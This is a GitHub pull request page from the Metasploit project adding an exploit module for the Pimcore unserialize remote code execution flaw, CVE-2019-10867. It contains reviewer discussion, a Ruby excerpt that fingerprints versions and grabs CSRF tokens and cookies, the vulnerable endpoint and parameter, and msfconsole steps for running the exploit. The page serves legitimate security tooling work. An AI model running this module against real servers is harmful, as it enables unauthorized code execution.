-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Pimcore from 4.0.0 to 5.6.6 Unserialize RCE (CVE-2019-10867) #11697
Conversation
Hi @bcoles, what other documentation do you need in addition to that already shared? |
documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md
Outdated
Show resolved
Hide resolved
) | ||
end | ||
|
||
def login |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
metasploit-framework/modules/exploits/multi/http/pimcore_unserialize_rce.rb
Lines 89 to 134 in deaa66d
res = send_request_cgi( | |
'method' => 'GET', | |
'uri' => normalize_uri(uri), | |
'cookie' => res.get_cookies | |
) | |
if res && res.code == 200 | |
# Pimcore 5.x | |
# Tested on 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 | |
unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty? | |
datastore['csrfToken'] = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s | |
datastore['cookies'] = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0] + ' pimcore_admin_sid=1;' | |
# Version | |
version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0] | |
build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1] | |
print_status("Pimcore version: #{version}") | |
print_status("Pimcore build: #{build}") | |
if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6') | |
print_good("The target is vulnerable!") | |
return targets[0] | |
else | |
return nil | |
end | |
end | |
# Pimcore 4.x | |
# Tested on 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 | |
unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty? | |
datastore['csrfToken'] = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s | |
datastore['cookies'] = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0] | |
# Version | |
version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0] | |
build = res.body.scan(/build: "([0-9]+)",/i).flatten[0] | |
print_status("Pimcore version: #{version}") | |
print_status("Pimcore build: #{build}") | |
if Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5') | |
print_good("The target is vulnerable!") | |
return targets[1] | |
else | |
return nil | |
end | |
end | |
return nil |
I'd suggest maybe placing all of the version-checking functionality in login()
into a new function and utilizing that function in check()
. It would both reduce the login()
function and help check()
better determine target exploitability.
Most of the code I'm referencing is linked above.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi space-r7! It is not possible to do what you suggest because:
- to determine the version number you need to log in (so leave a trace on target; not recommended by the documentation of the check function).
- determine the version number is necessary in order to complete the log in, save the right cookies and grab the CSRF Token.
We could simplify the login function with several small function such as: grab cookie, grab token, check version and set msf target. What do you think about it?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
That makes sense! That sounds good to me! Thanks!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I just created a PR on your branch for the remaining changes that I think would improve your module. Other than those small changes, this looks good to me. Thank you!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you very much! I've merge your PR.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you!
Add more error handling
Tested on
|
Release NotesThe multi/http/pimcore_unserialize_rce exploit module has been added to the framework. This module gains remote code execution by exploiting a PHP deserialization vulnerability in Pimcore post authentication for versions prior to 5.7.1. |
This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10867
pimcore/pimcore@38a29e2
https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998
This module has been tested successfully on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload and on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload.
Verification
The steps needed to make sure this thing works:
msfconsole
use exploit/multi/http/pimcore_unserialize_rce
set RHOST <IP>
set USERNAME <USERNAME>
set PASSWORD <PASSWORD>
check
The target service is running, but could not be validated.
exploit
Scenario
Pimcore 5.x
Pimcore 4.x
Testing
msfconsole
use exploit/multi/http/pimcore_unserialize_rce
set RHOST <IP>
set USERNAME <USERNAME>
set PASSWORD <PASSWORD>
check
The target service is running, but could not be validated.
exploit